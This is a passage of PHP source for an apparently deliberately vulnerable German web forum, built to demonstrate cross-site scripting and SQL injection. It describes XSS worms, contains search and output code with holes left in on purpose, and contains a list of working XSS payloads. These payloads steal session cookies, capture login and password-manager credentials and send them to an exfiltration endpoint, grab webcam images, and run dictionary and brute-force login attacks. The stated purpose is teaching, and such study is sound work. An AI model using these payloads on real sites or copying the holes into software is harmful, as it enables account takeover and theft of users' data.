.(($var['tagline']) ? "\n<hr class='tl' /><font size='2'>\r".strtr($var['tagline'],(($leak) ? array() : $html))."\r</font>" : ""))."</fieldset>";
}
if(!isset($q[1])) // or !preg_match('/^\d+$/',$q[1])
$rows = array_reverse($rows);
if(isset($_SESSION['uid']) and $_SESSION['uid'] or $gast)
$out .= "<table align='right'><tr><td><a href='$self/Beitrag".(($request == 'Blog') ? "?blog" : "")."'>Neuen Beitrag verfassen</a></td></tr></table>";
$var = ($request == 'Mail' and $uid) ? array('die Mail','Mails','Mail-Themen') : array('Beitrag','Beiträge','Beitragsthemen');
}
if(count($rows) > 0)
$out .= "<center>Es ".(($val[0] == $val[1]) ? "wird $var[0] Nr. ".number_format($val[0],0,'','.')." ": "werden die $var[1] ".number_format($val[0],0,'','.')." bis ".number_format($val[1],0,'','.')." von insgesamt ".number_format($num,0,'','.').((isset($q[1])) ? " $var[1] " : " $var[2] "))
.((count($q) > 1 and $q[1] != '' and !preg_match('/^\d+$/',$q[1])) ? "mit dem Suchbegriff: "<a href='$self/Suche?$getopt'>".(($leak) ? $q[1] : strtr($q[1],$html))."</a>" " : '')." angezeigt" // XSS
.((count($usr) > 1) ? ", die von ".((is_null($usr[2])) ? "Unbekannt" : "<a href='$self/Profil/$usr[2]'>$usr[2]</a>")." geschrieben wurde".(($val[0] == $val[1]) ? '' : 'n') : '')
."!</center><h4 align='center'>$code</h4>".implode("<br /><hr style='display:none' />\r\n",$rows)."<h4 align='center'>$code</h4>"
.((isset($q[2]) and $q[2] and !preg_match('/^\d+$/',$q[1])) ? "<script type='text/javascript'><!--\n".preg_replace($js,'',"// Ergebnisse mit JavaScript hervorheben
var d = window.document,
a = document.getElementsByClassName('cr'),
r = new RegExp('".implode('|',$q[2])."','gi');
h = d.createElement('span');
h.className = 'shl';
for(b=0;b<a.length;b++) {
o = [a[b]],
i = 0;
do {
m = o[i];
if(m.nodeType == m.TEXT_NODE) {
r.lastIndex = 0;
l = r.exec(m.nodeValue);
if(l !== null) {
k = l[0].length;
if(r.lastIndex > k) {
m.splitText(r.lastIndex - k);
m = m.nextSibling;
}
if(m.nodeValue.length > k) {
m.splitText(k);
o[i++] = m.nextSibling;
}
(t = h.cloneNode(true)).appendChild(d.createTextNode(l[0]));
m.parentNode.replaceChild(t,m);
}
}
else {
j = m.childNodes.length;
while(j)
o[i++] = m.childNodes.item(--j);
}
}
while(i--);
}") // a[b].innerHTML = a[b].innerHTML.replace(/(^|[>.,!?()\s;-])(".implode('|',$q[2]).")([<.,!?()\s&-]|$)/gi,'$1<span class=\'hl\'>$2<\/span>$3');
."//--></script>" : "")."<!---->";
else
if($user or $s)
$out .= "<center>Keine Einträge "
.((count($q) > 1)? "mit den Suchbegriff: "<a href='$self/Suche?$getopt'>".(($leak) ? $q[1] : strtr($q[1],$html))."</a>"" : "") // XSS
.((count($usr) > 1) ? " von <a href='$self/Profil?id=$usr[1]'>$usr[2]</a>" : "")." gefunden!</center>";
elseif($out == '' and $content = $sql['sq']($conn,"
select ifnull(r.content,ifnull(c.content,''))
from [cms] as c
left join [cms] as r on r.name like c.content
where c.name = '' and c.status/2%4 <= ".($status/2%2 + $status%2*2)))
$out = "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $content : strtr($content,array_slice($html,1))))."</div>";
}
}
# Impressum
if((isset($_REQUEST['request']) and $_REQUEST['request'] == 'Impressum' or $request == 'Impressum') and $var = array('Bei Aufruf der Suchfunktion:','<small title="Der Angriff benötigt eine Internet-Verbindung">*</small>') and $creolevar['type'] = 'intern')
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),"??li=[[::w/)Login(_~(Informationstechnik~)]]????pm=:php.net/manual/de/????rp=reference.pcre.pattern.modifiers??$info[4]$info[6]Dieses ??if:F[[::w/Internetf)orum]]?? (//Basierend auf [[::w/)PHP]] 4.3+ und [[::w/)SQLite]] 2.8//) ist für die Verdeutlichung von ??ak:Angriffe??n und ??sl:[[::w/)<<<toutf Sicherheitslücke(_~(Software~)>>>]]??n mit ??xs:[[::w/)Cross-Site-Scripting]]?? und ??si:[[::w/)SQL-Injection]]?? gedacht!
Es soll zeigen, wie man es **NICHT** machen soll, und was passieren kann, wenn man es **DOCH** macht ;-)".(($leak !== 0 and isset($_COOKIE['leak']) and !$_COOKIE['leak']) ? "\n\n**++Die ??sl??n wurden per Cookie deaktiviert!++**
Um die Angriffsbeispiele wieder sichtbar zu machen:
* muss man entweder die ??sl??n wieder **[[^Le)ak]]tivieren**
* oder sich mit A[[::w/Systema)dministrat(or]]iven Rechten anmelden (//z.B. als der [[^Profil?id=1|erste Benutzer]] des ??if??s//)" : "").(($leak or $status/2%2) ? "
Zur Demonstration wurden einige (//[[^Leak^Sicherheitslücken ein/aus Schalten^|abschaltbare]]//) ??sl??n eingebaut, die das Einschleusen von beliebigen ??pc:C[[::w/Programmc)ode]]?? vom ??wb:[[::w/)Webbrowser]]?? ermöglichen!
Diese Lücken befinden sich in der [[^Such(e?id=&q=]]funktion, [[^Profil(?id=]]anzeige, [[^Abmelde(n?id=]]funktion$info[0], [[^Chat]]-Funktion und im [[::l|Forum]] selbst, die z.B. mit vorgegebenen Beispielen ausgenutzt werden können. ([[#url-attack|//Siehe unten!//]])
Für den Betrieb des ??if??s wird ein A[[:httpd.a)pache(.org]]-Server empfohlen, wo die Directive P[[:httpd.apache.org/docs/current/de/mod/core.html#acceptp)athinfo]] aktiviert ist. Als alternative geht auch der [[??pm??features.commandline.webserver.php|Eingebaute Webserver]] in ??pp:[[::w/)PHP]]??.
Als [[::w/)Datenbank]] wird [[::w/)SQLite]] 2.8 benötigt, was leider nur in ??pp?? zwischen 4.4 und 5.3 unterstützt wird. (//Ab ??pp?? 5.4 ist nur noch [[::w/)SQLite]] 3 verfügbar, was ein zusätzliches [[:mengelke.de/.by|Addon]] erfordert//) ??pp?? sollte so konfiguriert werden, dass G[[??pm??security.g)lobals(.php]] und [[??pm??security.magicquotes.php|Magic Quotes]] deaktiviert ist. Das ??if?? wird mit aktuellen [[:PHP(.net]]-??vn:Versionen?? (//Ab Version 7.0 oder neuer//) wegen [[??pm????rp??.php#??rp??.eval|preg_replace/eval]], nicht mehr funktionieren. (//Dazu wird es in Zukunft **keinen** [[::w/)Workaround]] geben!//)
Alle Beispiel-??ak?? wurden für den [[::w/)Mozilla_Firefox|+]] entwickelt und getestet.
* Für andere ??wb?? wie z.B. [[::w/)Opera]] oder [[::w/)Internet_Explorer]] müssen die ??ak?? eventuell entsprechend angepasst werden.
* Für ??gc:[[::w/)Google_Chrome|+]]?? sind sämtliche ??ak?? mit ??xs??, die per ??hg:[[::w/Hypertext_Transfer_Protocol#HTTP_)GET]]?? über die ??ul:[[::w/Uniform_Resource_Locator|URL]]?? ergeschleust werden, nicht so ohne weiteres möglich, da sie erkannt und größtenteils abgefangen werden! Verschleierte Methoden, wie z.B. ??64:[[::w/)Base64]]?? führen durchaus zum erfolgreichen Angriff! Entsprechende ??ak?? sind mit \"Chrome\" gekenntzeichnet!
* Alle Angriffe laufen über den ??wb?? - d.H. Wird der ??wb?? geschlossen, sind alle Angriffe beendet, bis dieses ??lf:[[::l|Forum]]?? wieder aufgerufen wird.
Für dieses ??lf?? wurden drei verschiedene [[::w/Computerwurm|XSS-Würmer]] //(In unterschiedlichen größen und Eigenschaften)// entwickelt:
* Der **umfangreiche** [[^Worm??qt:.txt^Quelltext anzeigen^??|Bot-Wurm]] (//knapp 3 KB//) kopiert sich in das ??bp:[[::l/Profil|Benutzerprofil]]??. Sobald man im ??lf?? ??am:angemeldet?? ist und sich den Teil anschaut, der vom Wurm Infiziert wurde (z.B. das ??bp??), kopiert sich der Wurm automatisch und unsichtbar in das eigene ??bp?? und greift dabei alle [[^SQL?worm|Persönlichen Daten]] ab. Ist kein Benutzer ??am??, wird das ??li??-Formular modifiziert, um die eingegebenen [[^SQL?account|Login-Daten]] abzugreifen. Anschließend wartet ein eingebauter [[::w/)Bot(net]] via [[^Chat]] auf [[^BNPS??qt??|Befehle]] vom [[::w/Botnet#Command-and-)Control-(Technologien]]Center. (//Rückmeldungen vom Bot sind nur dann Möglich, wenn der Benutzer gerade ??am?? ist//)
* Der [[^Wormy??qt??|einfache Wurm]] (//knapp 500 Bytes//) kopiert sich ebenfalls in das ??bp??, enthält aber dabei keine Tarnmöglichkeit oder weitere Angriffsfunktionen und löscht bei der Infizierung das ursprüngliche ??bp??. Kann dafür optional unsichtbar eine [[::w/)Webseite]] aufrufen.
* Der [[^Wormline??qt??|Mini-Tagline Wurm]] kann sich aufgrund seiner sehr kleinen größe (//ca. 120 Bytes//), nur über ??hg?? in die [[::w/)Tagline]] des aktuellen Benutzers kopieren! Dabei wird auch der Tagline-Text des Benutzers durch den Wurm überschrieben!
Genau genommen ist dieses ??if?? ein Hackerwerkzeug und fällt unter dem [[::w/)Hackerparagraf]], da die einzelnen Beispiel-??ak?? Theoretisch auch auf andere ??ws:[[::w/)Web(seite]]??pr??ae??senzen im Internet angewendet werden können! Genauso wie eine [[::w/)Suchmaschine]] zum suchen von Informationen oder zum aufspühren von anfälligen [[::w/)Webseite]]n eingesetzt werden kann. Der eigentliche Zweck dieses ??if??s dient zur Aufklärung, damit Sie die ??ak?? verstehen und ihre ??ws??auftritte sicher machen können!" : "")."
Das ??if?? selber besteht nur aus einer einzigen [[::w/)Quelltext]]datei und wurde als [[::w/)Proof_of_Concept|+]] für [[::w/Spaghetticode|unübersichtlichen]] und [[::w/Code-Smell|schlechten]] [[::w/)Programmierstil]], ohne eigene [[::w/)Funktion(??wp:_~(Programmierung~)??)]]en geschrieben. (Mit Ausnahme der [[::w/)Chat]]-Funktion und die ??ak??, die auf ??js:[[::w/)JavaScript]]?? basieren). Die [[^Creole^Creole Testen^]]-Formatierung wurde mit einem [[::w/Feld_~(Datentyp~)|Array]] von [[::w/)<<<toutf Regulärer_Ausdruck|Regulären Ausdrücken>>>]] umgesetzt, die Teilweise [[??pm????rp??.php#??rp??.eval|aktiven Code]] beinhalten.
Unterstützt werden alle für Foren üblichen Grundfunktion, wie: [[::w/Moderator_\(Beruf\)|Administration]], [[::w/Datensicherung|Backup]], [[::w/)BBCode]], [[::w/)Benutzerkont(o]]en, [[::w/)Ajax(_??wp??]]-[[::w/)Chat]] (Optional mit [[::w/)<<<toutf Diffie-Hellman(-Schlüsselaustausch>>>]] & [[::w/Advanced_Encryption_Standard|AES]] [[::w/)<<<toutf Ende-zu-Ende-Verschlüsselung>>>]] oder auch [[::w/)Chat]] ohne ??js??), [[::w/)Content-Management-System]], [[::w/)Creole(_\(Markup\)]], Datei-[[::w/)Upload]], [[::w/)Datensicherung]], [[::w/)Debug(ger]]-Modus, [[::w/Atom_\(Format\)|Feeds]], [[::w/)Pagination]], [[::w/)Salt(_~(Kryptologie~)]]-??li??$info[7], [[::w/)Session-(ID]]Sitzung (//Nur mit [[::w/HTTP-)Cookie]]s//), [[::w/)Smil(ey]]ies, [[::w/)Suchfunktion]], [[::w/Kommandozeile|SQLite-Konsole]] und [[::w/)Unicode]]s.
$info[5]
$info[1]
$info[2]
$info[3]
Lizenz zum [[^Source|Quelltext]] des Forums: [[::w/)GNU_General_Public_License|+]] - Projektseite: [[:MEngelke.de(/.by]]<p>© $date by $author</p></div>")
.(($leak or $status/2%2) ? "<p>Server: ".preg_replace('!\s?PHP/[\d.]+|$!'," PHP/".phpversion(),$_SERVER['SERVER_SOFTWARE'],1).(($sql) ? " SQLite/".$sql['lv']() : '')."</p>"
# Hacker-Code um die Sicherheitslücken angreifen zu können
.((($leak or $status/2%2) and $sql and $val = <<<eof
**__++Beschreibung und Erläuterungen++__**:
Die ersten ??al:Angriffslinks?? beschränken sich auf ??xs??, was per ??js?? nur im ??wb?? selbst ausgeführt wird. Man kann beliebige Inhalte auslesen/erzeugen und Benutzereingaben abfangen/einschleusen. Und unter idealen Voraussetzungen, ist es möglich [[::w/Malware|Schadsoftware]] auf dem Anwender-PC zu installieren.
Da ??gc?? die ??ak?? über die ??ul?? erfolgreich abwehren kann, wurden einige ??ak?? (//Nicht alle//) entsprechend mit ??64?? verschleiert und mit "//[[::w/Google_)Chrome]]//" gekennzeichnet. (//Dieser Trick setzt voraus, dass die ??ws??anwendung diese [[::w/Code|Kodierungsart]] unterstützt.//)
Teilweise sind die ??al?? etwas länger geworden (//bis zu 6 KB//). d.H. einige ??wb?? kommen mit den überlangen [[::w/Uniform_Resource_Locator|Urls]] nicht klar. Im dem Fall können Sie die Chrome-Links probieren, da diese durch die alternative [[::w/URL-Encoding|kodierung]] etwas kürzer sind.
Die Login-??ak?? sind Theoretisch auch ohne ??xs?? möglich, da hierbei der Login-Prozess direkt mit [[::w/)<<<toutf Wörterb(uchangriff>>>]]??ue??chern / [[::w/)Brute-Force(-Methode]] angegriffen wird. (//Für solche ??ak?? kommen normalerweise externe Hackerwerkzeuge zum Einsatz!//)
Die ??ak?? mit ??si?? tricksen die ??wa:[[::w/)Webanwendung]]?? aus, um direkt auf die ??db:[[::w/)Datenbank]]?? zugreifen zu können. Da die meisten ??wa?? ihrer eigenen ??db?? vertrauen, werden die Inhalte meistens ungefiltert ausgegeben. Es können dabei auch beliebige (//auch interne und geheime//) Daten ausgelesen werden. Unter bestimmten Bedingungen, können auch Daten verändert oder hinzugefügt werden. Reine ??ak?? mit ??si?? funktionieren auch ohne ??js??, da nicht der ??wb?? vom Anwender, sondern die ??db?? des Betreibers angegriffen wird!
Kombiniert man verschiedene Schwachstellen (//In diesem Fall ??xs?? mit ??si??//), können dadurch neue ??sl??n entstehen, da man die schwächen mit den stärken der einzelnen Varianten ausgleichen kann oder sich hinter einer ??sl?? noch weitere Angriffsmöglichkeiten lauern können.
Ein [[::W/)XSS(_worm]]-Wurm ist besonders gefährlich, weil es nicht von jeden [[::w/)Antivirenprogramm]] gefunden werden kann. Der Wurm wird aus der ??wa?? geladen und kann ohne auf dem [[::w/Personal_)Computer]] gespeichert zu werden, vom ??wb?? ausgeführt werden. Auch wenn die Rechte im ??wb?? sehr bescheiden sind, kann der Wurm dennoch in gewissen Rahmen den ??wb?? kontrollieren. (//z.B. sich weiter verbreiten und die [[::w/)<<<toutf Identität(sdiebstahl>>>]] des Benutzer annehmen oder stehlen//) Steht der Wurm in direkter verbindung zum Angreifer, so kann der "[[::w/)Bot(net]]" jederzeit beliebige [[^BNPS??qt??|Befehle]] auf dem Opfer-PC ausführen. In der Regel ist es ein ganzer Schwarm von [[::w/)Bot(net]]s, die ganze Infrastrukturen angreifen und lahm legen können.
Mit [[::W/)Code_injection|+]] ist alles möglich. Man kann den kompletten Server übernehmen und alles runterladen, was darauf gespeichert ist oder hochladen und ausführen, was man möchte. Die Lücke steckt hier in der [[^Creole]]-Formatierung und muss explizit im [[::w/)Quelltext]] aktiviert werden. Die entsprechenden ??al?? benötigen hier nur zur Präsentation ??xs?? und ??si??. (//Technisch wird nur der Server angegriffen!//)
eof
) ? "<table align='left'><tr><td class='cr'><fieldset><legend><a name='url-attack'><b>URL-Attack</b> <small>(Weitere Informationen in der Link-Beschreibung)</small></a></legend>
<ol><li><a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>Cross-Site-Scripting</a> (Sicherheitslücke in der <a href='$self/Suche'$sel>Suchfunktion</a>)<ul>
<li><a title='$var[0] ".($k = 'Einen beliebigen Text ausgeben!')."' href='$self/Suche?q=".urlencode($v = "<script>alert('Hello World!')</script>")."'$atk>Hello World!</a> - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Forum-Titel beliebig ändern!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',"<script>
document.getElementsByClassName('title')[0].innerHTML = ' Have a nice day!';
</script>"),$attack))."' onClick='this.href=this.href.replace(/\+.*?(?=%27)/g,prompt(\"Bitte geben Sie einen beliebigen Titel!\",\"Hello World!\"))'$atk>Forum-Titel</a> - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Alle Grafiken durch Katzenbilder austauschen!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
Place Kitten</a><script>
document.body.setAttribute("onload","
for(d=0;d<document.images.length;d++)
document.images[d].src = '_clink_/' + document.images[d].width + '/' + document.images[d].height + '?' + d;
a = document.getElementsByTagName('*');
for(b=0;b<a.length;b++)
if((c = window.getComputedStyle(a[b])) && c.backgroundImage && c.backgroundImage != 'none')
a[b].style.backgroundImage = 'url(_clink_/' + parseInt(c.width) + '/' + parseInt(c.height) + '?' + d++ + ')';");
</script>
eof
)."<a name='cat' rel= \" \">",$attack))."'$atk>Katzenbilder</a>".((substr($attack['_clink_'],0,1) == '/') ? '' : $var[1])." - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Einen beliebigen Werbebanner ausgeben!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
Werbebanner</a>"<script>
(x = document.getElementsByTagName('body')[0]).innerHTML = '<center><a href="_hlink_" target="_blank" onClick=this.href="_elink_"><img src=" _blink_" alt="Werbung" border="0"></a></center>' + x.innerHTML;
</script>
eof
)."<a name='ads' rel= \" \">",$attack))."' onClick='this.href=this.href.replace(/\+http[:%\w.\/-]+(?=%22)/g,prompt(\"Bitte geben Sie eine Banner-URL ein!\",\"$attack[_blink_]\"))'$atk>Werbebanner</a>".((substr($attack['_blink_'],0,1) == '/') ? '' : $var[1])." - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Eine beliebige Webseite per iframes anzeigen!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
<script>
document.getElementsByTagName('body')[0].innerHTML = '<center><iframe src=" _glink_" width="' + (window.innerWidth * 0.97) + '" height="' + (window.innerHeight * 0.97) + '" frameborder="0"></iframe></center>';
</script>
eof
),$attack))."' onClick='this.href=this.href.replace(/\+http[:%\w.-\/]+(?=%22)/g,prompt(\"Bitte geben Sie eine Ziel-Webseite ein!\",\"$attack[_glink_]\"))'$atk>Fremde Seite</a>".((substr($attack['_glink_'],0,1) == '/') ? '' : $var[1])." - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Das Flash-Spiel: Nyan Cat Fly starten!')."'href='$self/Suche?q=".urlencode($v = strtr(<<<eof
Nyan Cat Fly!</a> <object width="640" height="480"><param name="movie" value="_nlink_"><embed src="_nlink_" bgcolor="#021a40" width="640" height="480"></object>
eof
,$attack))."'$atk>Nyan Cat Fly!</a>".((substr($attack['_nlink_'],0,1) == '/') ? '' : $var[1])." spielen - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$attack[_flink_]'$tgb>Flash</a> wird benötigt)</small>
<li><a class='wipe' href='$wiki/Rickrolling'$tgb>Rickrolling</a>: <a title='$var[0] ".($k = 'Ein Video von Rick Astley abspielen!')."' href='$self/Suche?q=".urlencode($v = strtr(<<<eof
Rickrolling</a> <iframe src="_ylink_" width="640" height="480" frameborder="0"></iframe>
eof
,$attack))."'$atk>Never Gonna Give You Up</a>".((substr($attack['_ylink_'],0,1) == '/') ? '' : $var[1])." - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a></small>
<li><a title='$var[0] ".($k = 'Webcam aktivieren und ein Snapschuss machen')."' href='$self/Suche?q=".urlencode($v = 'WebCam</a>"<table border="1" onclick="if(lms)ctx.drawImage(video,0,0,320,240);"><tr><td><video autoplay="true" id="video" width="320" height="240" style="background-color:grey"></video></td><td><canvas id="canvas" width="320" height="240"></canvas></td></tr></table>'.preg_replace($js,"","<script>
var video = document.querySelector('#video'), canvas = document.querySelector('#canvas'), ctx = canvas.getContext('2d'), lms = null;
navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia || navigator.oGetUserMedia;
if(navigator.getUserMedia)
navigator.getUserMedia({video:true},function(stream) { video.src = window.URL.createObjectURL(lms = stream); },function(e){});
</script>")."<span name='' style='display:none'>")."'$atk>Webcam abgreifen</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (Geht nur noch bei https und Firefox macht Probleme)</small>
<li><a title='$var[0] ".($k = 'Es schneien zu lassen!')."' href='$self/Suche?q=".urlencode($v = strtr(preg_replace($js,'',<<<eof
Let it Snow</a><script>
var s = [],
margin = [],
mv = [],
crds = [],
lft = [],
color = ["#aaaacc","#ddddFF","#ccccDD"],
type = ["Arial Black","Arial Narrow","Times","Comic Sans MS"],
ie5 = document.all && document.getElementById && !navigator.userAgent.match(/Opera/),
ns6 = document.getElementById && !document.all,
opera = navigator.userAgent.match(/Opera/);
function initsnow() {
margin = ie5 || opera ? [document.body.clientHeight,document.body.clientWidth] : ns6 ? [window.innerHeight,window.innerWidth] : [];
snowsizerange = 22 - 8;
for(i=0;i<=35;i++)
crds[i] = 0,
lft[i] = Math.random() * 15,
mv[i] = 0.03 + Math.random() / 10,
s[i] = document.getElementById("s" + i),
s[i].style.fontFamily = type[Math.floor(Math.random() * type.length)],
s[i].size = Math.floor(Math.random() * snowsizerange) + 8,
s[i].style.fontSize = s[i].size,
s[i].style.color = color[Math.floor(Math.random() * color.length)],
s[i].sink = 0.6 * s[i].size / 5,
s[i].posx = Math.floor(Math.random() * (margin[1] - s[i].size)),
s[i].posy = Math.floor(Math.random() * (2 * margin[0] - margin[0] - 2 * s[i].size)),
s[i].style.left = s[i].posx,
s[i].style.top = s[i].posy;
movesnow();
}
function movesnow() {
for(i=0;i<=35;i++) {
crds[i] += mv[i];
s[i].posy += s[i].sink;
s[i].style.left = s[i].posx + lft[i] * Math.sin(crds[i]);
s[i].style.top = s[i].posy;
if(s[i].posy >= margin[0] - 2 * s[i].size || parseInt(s[i].style.left) > (margin[1] - 3 * lft[i]))
s[i].posx = Math.floor(Math.random() * (margin[1] - s[i].size)),
s[i].posy = 0;
}
var timer = setTimeout("movesnow()",50);
}
for(i=0;i<=35;i++)
document.write("<span id='s" + i + "' style='position:absolute;top:-22'>*</span>");
if(ie5 || ns6 || opera)
window.onload = initsnow;
</script>
eof
)."<a name='snow' rel= \" \">",$attack))."'$atk>Let it snow!</a> - <a title='$k' href='$self?b=".base64_encode($v)."'$atk><small><em>Chrome</em></small></a>
<li><a title='$var[0] ".($k = 'Den aktuellen Session-Cookie klauen und in die Hacker-Datenbank eintragen!')."' href='$self/Suche?q=cookies".urlencode($v = "</a>".preg_replace($js,'',<<<eof
<script>
p = new Image();
p.src = $attack[_jsleak_] + '?href=' + encodeURIComponent(location.host + location.pathname)
+ '&data='+encodeURIComponent(document.cookie) + '&useragent=' + encodeURIComponent(navigator.userAgent);
</script>
eof
)."<a name=\"\" rel= \" \" >")."'$atk>Cookieklau</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$self/SQL?cookie'$rel$sel>Geklaute Cookies anzeigen</a>)</small>
<li><a title='$var[0] ".($k = 'Die Anmeldedaten im Anmeldefeld werden abfangen und in die Hacker-Datenbank eintragen! Zur Verschleierung wird die fehlgeschlagene Suchausgabe verändert!')."' href='$self/Suche?q=".urlencode($v = "Sexy Milfbuster".str_pad('',20,"\t")."</a> \"".preg_replace($js,'',<<<eof
<script>
var x = document.login;
x.onsubmit = function() {
if(x.username.value + x.password.value != '') {
try {
var p = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
p = new ActiveXObject('Microsoft.XMLHTTP');
}
p.open('GET',$attack[_jsleak_]
+ '?href=' + encodeURIComponent(location.host + location.pathname)
+ '&data=' + encodeURIComponent(document.cookie
+ '; user=' + x.username.value
+ '; pass=' + x.password.value)
+ '&useragent=' + encodeURIComponent(navigator.userAgent),false);
p.send(null);
}
else
return false;
}
</script>
eof
)." können wegen der Altersbeschränkung angezeigt werden!<br>Bitte loggen Sie sich ein, um das Suchergebnis anzuzeigen! Dann werden alle Suchergebnisse \"<b>UNZENSIERT</b><a name='sex'>")."'$atk>Logindaten abfrangen</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$self/SQL?account'$rel$sel>Geklaute Zugangsdaten anzeigen</a>)</small>
<li><a title='".($k = 'Bei Aufruf der Suchfunktion, werden die automatisch eingetragenen Benutzerdaten vom Passwordmanager in die Hacker-Datenbank überführt!')."' href='$self/Suche?q=".urlencode($v = strtr("Snoopy".str_pad('',16,"\t").<<<eof
</a>" angezeigt!<form name='hack' style='margin:0'><div style='display:none'><input type='text' name='username' onchange='hack()'><input type='password' name='password'></div></form><script>
eof
.preg_replace($js,'',<<<eof
var x = document.hack;
function hack() {
if(x.username.value + x.password.value != '') {
p = new Image(),
p.src = $attack[_jsleak_]
+ '?href=' + encodeURIComponent(location.host + location.pathname)
+ '&data=' + encodeURIComponent(document.cookie
+ '; user=' + x.username.value
+ '; pass=' + x.password.value)
+ '&useragent=' + encodeURIComponent(navigator.userAgent);
}
}
window.setTimeout('hack()',1000);
eof
)."</script><a style='display:none' name= ' '",$attack))."'$atk>Accountdaten vom Passwordmanager</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a> (<a href='$self/SQL?account'$rel$sel>Zugangsdaten anzeigen</a>)</small>
<li><a title='".($k = 'Bei Aufruf der Suchfunktion, wird versucht per Passwort-Liste das Login-Kennwort zu ermitteln!')."' href='$self/Suche?q=".urlencode($v = strtr("Wordbook Attack".'</a>" angezeigt!<script>'.preg_replace($js,'',"
try {
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
var B = document.login;
x = document.createElement('textarea'),
x.rows = '8',
x.cols = '15',
x.name = 'password',
x.style.width = '100%',
x.value = ' _wordlist_ '.replace(/\s/g,'\\n');
B.password.parentNode.replaceChild(x,B.password);
B.login.setAttribute('onclick','putlogin();return false');
function putlogin() {
if(A && B.username.value != '' && (x = B.password.value.match(/^[^\\r\\n]*(?!$)/))) {
x = 'login=Ok&username=' + escape(B.username.value) + '&password=' + escape(x);
A.open('POST',location.pathname + '?request=Suche',true);
A.setRequestHeader('Content-type','application/x-www-form-urlencoded');
A.setRequestHeader('Content-length',x.length);
A.setRequestHeader('Connection','close');
A.onreadystatechange = getlogin;
A.send(x);
}
else
alert('Kennwort war nicht dabei!');
}
function getlogin() {
if(A && A.readyState == 4 && A.status == 200) {
if(A.responseText.match(/<form name='login'/)) {
B.password.value = B.password.value.replace(/^.*[\\r\\n]*/,'');
return putlogin();
}
else {
alert(B.password.value.match(/^.*/));
location.href = location.pathname;
}
}
}")."</script><a style='display:none' name= ' '",$attack))."'$atk>Login-Passwörter mit Wörterbuch durchprobieren</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a></small>
<li><a title='".($k = 'Bei Aufruf der Suchfunktion, werden per Brute-Force alle Kennwörter durchprobiert!')."' href='$self/Suche?q=".urlencode($v = strtr("Brute-Force Attack"."</a>\" angezeigt!<script>".preg_replace($js,'',"
try {
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
var B = document.login,C,D,x,y;
x = document.createElement('div'),
x.innerHTML = '<small>Charset:</small><br><input type=\"text\" name=\"charset\" value=\"_charlist_\"><br><small>Min / Max Kennwortlänge:</small><br><input type=\"text\" size=\"2\" name=\"min\" value=\"3\"> / <input type=\"text\" size=\"2\" name=\"max\" value=\"6\">';
B.info.parentNode.replaceChild(x,B.info);
B.password.setAttribute('type','text');
B.password.setAttribute('readonly',0);
B.password.setAttribute('tabindex',4);
x = document.createElement('input'),
x.type = 'button',
x.name = 'stop',
x.value = 'Stop';
B.login.parentNode.insertBefore(x,B.login.nextSibling);
B.stop.setAttribute('onclick','B.username.value=\"\"');
B.login.setAttribute('onclick','initpass(); return false');
function initpass() {
C = [],
D = [1,parseInt(new Date().getTime(),10)];
for(x=0;x<B.min.value;x++)
C[x] = B.charset.value.length-1;
makepass();
putlogin();
}
function makepass() {
y = '';
for(x in C)
y += B.charset.value.substr(C[x],1);
B.password.value = y;
}
function nextpass() {
y = 0,
D[0]++;
for(x in C) {
if(C[x]-- > 0) {
y = 0;
break;
}
else
C[x] = B.charset.value.length-1;
y = 1;
}
if(y == 1 && parseInt(x,10) + 1 == C.length)
if(C.length == parseInt(B.max.value,10))
C = false;
else
C.push(B.charset.value.length-1);
return C;
}
function putlogin() {
if(A && B.username.value != '' && B.password.value != '') {
x = 'login=Ok&username=' + escape(B.username.value) + '&password=' + escape(B.password.value);
A.open('POST',location.pathname + '?request=Suche',true);
A.setRequestHeader('Content-type','application/x-www-form-urlencoded');
A.setRequestHeader('Content-length',x.length);
A.setRequestHeader('Connection','close');
A.onreadystatechange = getlogin;
A.send(x);
}
else
B.password.value = '';
}
function getlogin() {
if(A && A.readyState == 4 && A.status == 200) {
if(A.responseText.match(/<form name='login'/)) {
if(nextpass())
return putlogin(makepass());
}
else {
alert('Kennwort:' + ' ' + B.password.value + '\\nVersuche:' + ' ' + D[0] + '\\n' + (Math.round(D[0]/Math.round((new Date().getTime()-D[1])/1000)*100)/100) + ' Versuche pro Sekunde');
location.href = location.pathname;
}
}
}
")."</script><a style='display:none' name= ' '",$attack))."'$atk>Login-Passwörter per Brute-Force durchprobieren</a> - <small><a title='$k' href='$self?b=".base64_encode($v)."'$atk><em>Chrome</em></a></small>
